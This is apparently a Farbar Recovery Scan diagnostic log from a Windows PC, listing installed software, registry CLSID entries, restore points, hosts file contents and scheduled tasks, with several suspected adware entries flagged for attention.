AutoCAD 2011 - English (Version: 18.1.49.0 - Autodesk) Hidden
AutoCAD 2011 Language Pack - English (Version: 18.1.49.0 - Autodesk) Hidden
Autodesk Material Library 2011 (HKLM-x32\...\{9DEABCB6-B759-4D52-92F8-51B34A2B4D40}) (Version: 2.0.0.49 - Autodesk)
Autodesk Material Library 2011 Base Image library (HKLM-x32\...\{CD1E078C-A6B9-47DA-B035-6365C85C7832}) (Version: 2.0.0.49 - Autodesk)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
C6100 (x32 Version: 130.0.365.000 - Hewlett-Packard) Hidden
c6100_Help (x32 Version: 82.0.256.000 - Hewlett-Packard) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.17 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.2.4255 - CDBurnerXP)
CDBurnerXP Free Download Packages (HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\CDBurnerXP Free Download Packages) (Version:  - ) <==== ATTENTION
Copy (x32 Version: 130.0.428.000 - Hewlett-Packard) Hidden
CyberLink DVD Suite Deluxe (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.2115 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Deal Ply Removal Tool (HKLM-x32\...\Deal Ply Removal Tool_is1) (Version: build_1.0.0.143_rev_3131_date_15:30:42 15-07-13 - Security Stronghold)
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 130.0.465.000 - Hewlett-Packard) Hidden
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
DocProc (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
DVD Flick 1.3.0.7 (HKLM-x32\...\DVD Flick_is1) (Version: 1.3.0.7 - Dennis Meuwissen)
DVD Menu Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{FB4BB287-37F9-4E27-9C4D-2D3882E08EFF}) (Version: 3.1.3224 - Hewlett-Packard)
DVD Menu Pack for HP MediaSmart Video (x32 Version: 3.1.3224 - Hewlett-Packard) Hidden
Elements 12 Organizer (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
FARO LS 1.1.406.58 (HKLM-x32\...\{951B0F30-9F1A-4BF6-B3DA-99EB0E917B1C}) (Version: 4.6.58.2 - FARO Scanner Production)
Fax (x32 Version: 130.0.418.000 - Hewlett-Packard) Hidden
File Association Helper (HKLM\...\{C168639F-5810-4EC8-B1E8-0251AA8A771C}) (Version: 1.2.225.65451 - WinZip Computing International, LLC)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google SketchUp 8 (HKLM-x32\...\{47BBA5AA-CA6F-4A41-858D-A7A776F29A8B}) (Version: 3.0.11752 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
Hardware Diagnostic Tools (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5247.34 - PC-Doctor, Inc.)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.9512.3162 - Hewlett-Packard)
HP Customer Participation Program 13.0 (HKLM\...\HPExtendedCapabilities) (Version: 13.0 - HP)
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 3.1.3317 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 3.1.3422 - Hewlett-Packard)
HP MediaSmart SmartMenu (HKLM\...\{88E60521-1E4E-4785-B9F1-1798A4BD0C30}) (Version: 3.1.0.1 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Officejet Pro 8620 Basic Device Software (HKLM\...\{A977D10D-989A-40D4-B0B1-450954516543}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
HP Officejet Pro 8620 Help (HKLM-x32\...\{9A4D71AB-9C68-4702-A4A2-A4DB7B0FE270}) (Version: 32.0.0 - Hewlett Packard)
HP Photosmart Essential 3.5 (HKLM\...\HP Photosmart Essential) (Version: 3.5 - HP)
HP Remote Solution (HKLM-x32\...\HP Remote Solution) (Version: 1.1.11.0 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{17B4760F-334B-475D-829F-1A3E94A6A4E6}) (Version: 1.2.3560.3170 - Hewlett-Packard)
HP Smart Web Printing 4.51 (HKLM\...\HP Smart Web Printing) (Version: 4.51 - HP)
HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP)
HP Support Assistant (HKLM-x32\...\{741CFE3A-1C0B-4A7D-8E08-5D78C911C09D}) (Version: 4.2.5.3 - Hewlett-Packard)
HP Support Information (HKLM-x32\...\{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}) (Version: 10.1.0002 - Hewlett-Packard)
HP Support Solutions Framework (HKLM-x32\...\{96D12EC9-720B-45FB-904C-36D6307A1C76}) (Version: 11.51.0048 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPAsset component for HP Active Support Library (x32 Version: 3.0.0.7 - Hewlett-Packard) Hidden
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPPhotoGadget (x32 Version: 130.0.282.000 - Hewlett-Packard) Hidden
HPPhotoSmartDiscLabelContent1 (x32 Version: 2.04.0000 - Hewlett-Packard) Hidden
HPPhotosmartEssential (x32 Version: 2.04.0000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
iCloud (HKLM\...\{2AAF09D5-4B3F-4975-B6A9-ECE2631FC942}) (Version: 4.0.5.20 - Apple Inc.)
InstallConverter (HKLM-x32\...\InstallConverter) (Version: 1.0 - InstallConverter) <==== ATTENTION!
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.2226 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2017 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.2017 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{CC8E94A2-55C7-4460-953C-2A790180578C}) (Version: 1.18.8.1 - LightScribe)
Logitech Harmony Remote Software (x86) (HKLM-x32\...\{634F79E1-2A41-4C40-9E8D-89EC740AC9D6}) (Version: 2.0 - Logitech)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
MarketResearch (x32 Version: 130.0.374.000 - Hewlett-Packard) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Live Search Toolbar (HKLM-x32\...\{DF802C05-4660-418c-970C-B988ADB1D316}) (Version: 3.0.566.0 - Microsoft Live Search Toolbar)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU (HKLM\...\Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Applications - ENU (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Applications - ENU) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Theme Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 3.1.3310 - Hewlett-Packard)
Movie Theme Pack for HP MediaSmart Video (x32 Version: 3.1.3310 - Hewlett-Packard) Hidden
Mozilla Firefox 34.0.5 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 34.0.5 (x86 en-US)) (Version: 34.0.5 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyHarmony (HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Network64 (Version: 130.0.572.000 - Hewlett-Packard) Hidden
Network64 (Version: 140.0.221.000 - Hewlett-Packard) Hidden
OCR Software by I.R.I.S. 13.0 (HKLM\...\HPOCR) (Version: 13.0 - HP)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.0 - Frank Heindörfer, Philip Chinery)
Photobucket Desktop (HKLM-x32\...\{D0916F1D-236D-4B9A-BCEA-F535444DCA41}) (Version: 1.0.3.1552 - Photobucket)
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3304 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.3304 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3503 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.3503 - CyberLink Corp.) Hidden
Product Improvement Study for HP Officejet Pro 8620 (HKLM\...\{99039186-EBEB-4127-BFA2-18B10A05ACE2}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
PSE12 STI Installer (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6196 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.2216 - CyberLink Corp.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Rosetta Stone Version 3 (HKLM-x32\...\{148E08FF-D7C4-46ED-8D4D-601C67FE0AFD}) (Version: 3.3.7.0 - Rosetta Stone Ltd.)
Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
Sentinel System Driver Installer 7.5.7 (HKLM-x32\...\{B281C7D1-C088-40E0-86EA-B2D9D7E0810A}) (Version: 7.5.7 - SafeNet, Inc.)
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 13.0 - HP)
Skype Click to Call (HKLM-x32\...\{B6CF2967-C81E-40C0-9815-C05774FEF120}) (Version: 6.13.13771 - Skype Technologies S.A.)
Skype™ 6.21 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
SmartWebPrinting (x32 Version: 130.0.457.000 - Hewlett-Packard) Hidden
SMPIS (HKLM-x32\...\{999052D7-44A2-49F8-9851-A3D2D297EE03}) (Version: 29.00.000 - Merry Mechanization Inc.)
SolidWorks 2011 x64 Edition SP02 (HKLM-x32\...\SolidWorks Installation Manager 20110-40200-1100-100) (Version: 19.2.0.49 - SolidWorks Corporation)
SolidWorks 2011 x64 Edition SP02 (Version: 19.120.49 - SolidWorks) Hidden
SolidWorks eDrawings 2011 SP02 (HKLM-x32\...\{67C6633B-5A12-4955-A5E4-98D703F9AFA3}) (Version: 11.2.113 - Dassault Systèmes SolidWorks Corp.)
SolidWorks eDrawings 2011 x64 Edition SP02 (Version: 11.2.113 - Dassault Systèmes SolidWorks Corp.) Hidden
SolidWorks Explorer 2011 SP02 (HKLM-x32\...\{5F590D74-AA75-410F-A778-3CDFCE12DCD4}) (Version: 19.20.49 - SolidWorks Corporation)
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
SQLAnywhere1000 (HKLM-x32\...\{349E9132-5101-4094-859E-0EEE6F3DDCD5}) (Version: 10.1.4157 - Merry Mechanization Inc)
Status (x32 Version: 130.0.469.000 - Hewlett-Packard) Hidden
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
TradeManager 2011 SP2 (HKLM-x32\...\TradeManager 2011 SP2) (Version:  - Alisoft)
TradeManager 2013 Beta2 (HKLM-x32\...\TradeManager) (Version:  - Alibaba (China) Network Technology Co., Ltd.)
TrayApp (x32 Version: 130.0.422.000 - Hewlett-Packard) Hidden
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 1.6.8 - Tweaking.com)
UnloadSupport (x32 Version: 11.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
WD Drive Utilities (HKLM-x32\...\{E61CFDDA-40DD-4400-95CA-12819C50B5C2}) (Version: 1.1.0.51 - Western Digital Technologies, Inc.)
WD Quick View (HKLM-x32\...\{D0A3A97D-7918-4B0B-B91E-775E00C36122}) (Version: 2.4.2.26 - Western Digital Technologies, Inc.)
WD Security (HKLM-x32\...\{A95E3E66-D5A4-404E-997D-02562AA492E8}) (Version: 1.0.5.7 - Western Digital Technologies, Inc.)
WD SmartWare (HKLM\...\{6BB4E4E8-17B9-4534-8A8E-89E53F12769C}) (Version: 2.4.2.26 - Western Digital Technologies, Inc.)
WD SmartWare Installer (HKLM-x32\...\{2d588de7-f4f6-4d6d-8719-32cbb9637e9e}) (Version: 2.4.2.26 - Western Digital Technologies, Inc.)
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
WinZip 19.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E5}) (Version: 19.0.11293 - WinZip Computing, S.L. )
Zoom Downloader (HKLM-x32\...\Zoom Downloader) (Version:  - Zoom Downloader) <==== ATTENTION!

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-998330651-303224156-1059126384-1004_Classes\CLSID\{4CEEAF57-0208-4CA4-A473-914C2D2FFC23}\InprocServer32 -> C:\Program Files (x86)\TradeManager\AliIMX_64.dll (Alibaba (China) Co., Ltd.)
CustomCLSID: HKU\S-1-5-21-998330651-303224156-1059126384-1004_Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InprocServer32 -> C:\Users\BR\AppData\Roaming\tricomfi\tivesen.dll No File <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-998330651-303224156-1059126384-1004_Classes\CLSID\{5D09DD40-CDC4-4C56-B615-0D1E3B357C2B}\InprocServer32 -> C:\Program Files (x86)\TradeManager\AliIMX_64.dll (Alibaba (China) Co., Ltd.)
CustomCLSID: HKU\S-1-5-21-998330651-303224156-1059126384-1004_Classes\CLSID\{6D7AE628-FF41-4CD3-91DD-34825BB1A251}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2011\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-998330651-303224156-1059126384-1004_Classes\CLSID\{C92FB640-AD4D-498A-9979-A51A2540C977}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2011\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-998330651-303224156-1059126384-1004_Classes\CLSID\{D70E31AD-2614-49F2-B0FC-ACA781D81F3E}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2011\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-998330651-303224156-1059126384-1004_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2011\acadficn.dll (Autodesk, Inc.)

==================== Restore Points  =========================

15-12-2014 20:34:01 Windows Update
18-12-2014 20:36:03 Windows Update
19-12-2014 03:00:11 Windows Update
22-12-2014 20:34:05 Windows Update
26-12-2014 17:50:31 Windows Update
30-12-2014 02:28:38 Windows Update
31-12-2014 10:10:18 OTL Restore Point - 31/12/2014 10:10:17 AM

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 18:34 - 2014-01-25 06:35 - 00000098 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {01B68D52-81A4-4E5D-A008-EBE7A5E1D7A8} - System32\Tasks\AdobeAAMUpdater-1.0-BRIAN-PC-BR => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2014-09-19] (Adobe Systems Incorporated)
Task: {137B4BA2-DE24-4F80-BC1F-179956948A9E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-05-03] (Adobe Systems Incorporated)
Task: {19835642-4FB1-409E-B1C8-8C8DAB245E33} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-09-24] (Hewlett-Packard)
Task: {261C88CB-C0A6-449C-8B7E-520CB4278507} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {2761B74C-FF47-4ABC-B888-2B671AC244E5} - System32\Tasks\{A5D314F0-456F-4CB4-B01B-01065EE19CB7} => pcalua.exe -a E:\setup.exe -d E:\
Task: {27D71A6F-22F6-4B2E-9904-223164E70563} - \SpeeditUp Update No Task File <==== ATTENTION
Task: {2A5E94B0-88B5-4A7C-AE52-03F3C01C221B} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {379D608C-0688-4B10-B21D-50B5B2A22E4F} - System32\Tasks\CLMLSvc => c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe [2009-10-22] (CyberLink)
Task: {4B06D158-F426-4D63-842D-A8D695E38F5E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {58044AB4-8524-4227-9073-AAA8DF62A596} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-09-24] (Hewlett-Packard)
Task: {6AB5DF9B-167C-4E53-B5F8-EC132C9AB8CD} - System32\Tasks\DVDAgent => c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
Task: {7016C1DA-8A0A-4266-A065-4ECEF51B751B} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-20] ()
Task: {76BFAC61-5025-4C95-9233-B223F5F3731E} - System32\Tasks\{8687F8BE-E36A-4EEF-AF42-1D43D36FA6D3} => pcalua.exe -a "C:\Program Files (x86)\VS Revo Group\Revo Uninstaller\Revouninstaller.exe" -d "C:\Program Files (x86)\VS Revo Group\Revo Uninstaller"
Task: {786E9D0A-E3FE-465E-BC0D-620FE1DFB271} - System32\Tasks\HPCustParticipation HP Officejet Pro 8620 => C:\Program Files\HP\HP Officejet Pro 8620\Bin\HPCustPartic.exe [2014-07-21] (Hewlett-Packard Development Company, LP)
Task: {80747828-AE28-4142-B594-2A8E87EF8F5F} - System32\Tasks\{12FF90D0-0CA3-410B-8D51-6027360B341C} => pcalua.exe -a E:\Setup.exe -d E:\
Task: {85F928BF-474B-410C-955F-9BC4A5E814AE} - System32\Tasks\{ECC6E21C-0E02-48C1-81A6-B7DF3E56C4A3} => pcalua.exe -a "C:\Program Files (x86)\MMI\MachineDriverInstaller.exe" -d C:\Users\BRIAN\Desktop -c C:\Users\BRIAN\Desktop\second-house.DXF
Task: {9A3CE333-775C-4F78-992D-AA2801A46B4E} - System32\Tasks\{6F7F92BF-441E-4C9E-852D-876D6730FB99} => pcalua.exe -a L:\AutoCAD_2011_English_Win_64bit.exe -d L:\
Task: {9E7B5155-9C08-45C9-9779-27D04278AC5D} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-08-21] (Piriform Ltd)
Task: {A478F95E-3FEA-4AA2-9564-F616630E60FB} - System32\Tasks\{E16CF7E6-DF4D-44A7-BD43-F43C46E7E55A} => pcalua.exe -a "C:\Users\BR\Documents\SolidWorks Downloads\SolidWorks 2011 SP02\swwi\data\setup.exe" -d "C:\Users\BR\Documents\SolidWorks Downloads\SolidWorks 2011 SP02\swwi\data"
Task: {A90692A5-EF3B-4528-88C1-87C7A202D5CA} - System32\Tasks\YourFileDownloader Installer Starter => C:\Users\BR\AppData\Local\Temp\YourFileDownloaderpoWld6tLtZ.exe [2014-12-24] (http://yourfile-downloader.com) <==== ATTENTION
Task: {AD73D1BF-E8BA-44CE-992E-38F1BF19BF40} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {BC023B06-0D54-426A-B5F9-A28527102E43} - System32\Tasks\{349F7917-DF9C-433B-BD70-8DF9498AE672} => pcalua.exe -a C:\Windows\Installer\{4F113377-0BA1-4552-9ABB-9BF220FAF132}\i386_SldWorks.exe -d "C:\Program Files (x86)\Mozilla Firefox" -c C:\Users\BR\AppData\Local\Temp\car-trailer-tilt-deck.snapshot.1-1.zip
Task: {BEBB79F8-7713-4DBF-9FF9-0BA8E1E28A44} - System32\Tasks\{992C1360-B7C4-4ED1-9082-8E159FCB82C3} => pcalua.exe -a C:\Users\BR\Downloads\setup.exe -d C:\Users\BR\Downloads
Task: {DD268EF9-0389-4933-BB76-5200E5670973} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {E58DB626-EECF-4E0B-B279-CE49CB629190} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {E9277419-9C0E-48AE-95EB-A2908B59EB8D} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {EB9802D6-15A7-4ACD-B627-BED4322F44A9} - System32\Tasks\Update Service HitsBlender => C:\Program Files (x86)\HitsBlenderUpdater\HitsBlenderUpdater.exe
Task: {EFBFF8D6-C539-4881-9214-7E4BE60C3988} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HPSAObjUtilTask => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\UtilTask.exe [2012-07-30] (Microsoft)
